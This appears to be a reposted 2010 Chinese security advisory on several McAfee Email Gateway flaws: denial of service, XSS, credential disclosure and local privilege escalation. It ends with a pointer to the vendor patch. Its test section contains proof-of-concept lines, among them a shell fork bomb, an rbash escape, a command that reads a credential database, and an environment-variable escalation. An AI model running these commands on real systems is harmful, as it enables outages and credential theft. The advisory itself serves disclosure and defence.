2010年(186)
分类:
2010-04-09 15:51:54
发布日期:2010-04-06 更新日期:2010-04-08 受影响系统: McAfee Email Gateway 6.7.2 HF1不受影响系统: McAfee Email Gateway 6.7.2 Hotfix 2描述: BUGTRAQ ID: 39242 McAfee Email Gateway之前名为IronMail,是企业级的硬件邮件网关和管理平台。 McAfee Email Gateway的6.7.2 Hotfix 2之前版本中的多个漏洞允许本地用户导致拒绝服务、读取敏感信息、获得权限提升,或允许远程攻击者执行跨站脚本攻击。 1) 处理CLI命令时的错误可能耗尽可用的系统资源。 2) 由于没有正确地过滤提交给admin/queuedMessage.do页面的queueMsgType和QtnType参数,远程攻击者可以通过提交恶意请求执行跨站脚本攻击。 3) 由于没有正确地限制对包含有敏感信息文件的访问,本地用户可以通过发布CLI命令泄露用户名或数据库凭据。 4) 处理环境变量时的错误可能允许本地用户通过CLI获得管理权限。 <*来源:Nahuel Grisolía 链接:http://secunia.com/advisories/39307/ *> 测试方法: 警 告 [Secure Mail]: command rbash –noprofile [Secure Mail]: :(){:|:&};: 跨站脚本 ("XSS");&QtnType=9 信息泄露 [Secure Mail]: command rbash –noprofile [Secure Mail]: grep -a '.*' /etc/pwd.db 本地权限提升 [Secure Mail]: command rbash –noprofile [Secure Mail]: declare -x USER="admin" If you want to check the new privilege: [Secure Mail]: cmd_admin set user unlock *** Invalid command: Usage - set user unlock [Secure Mail]: cmd_admin set user unlock admin Cannot unlock yourself. [Secure Mail]: exi 建议: 厂商补丁: McAfee ------ 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: https://supportcenter.securecomputing.com/ 浏览次数:57 严重程度:0(网友投票) |
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 |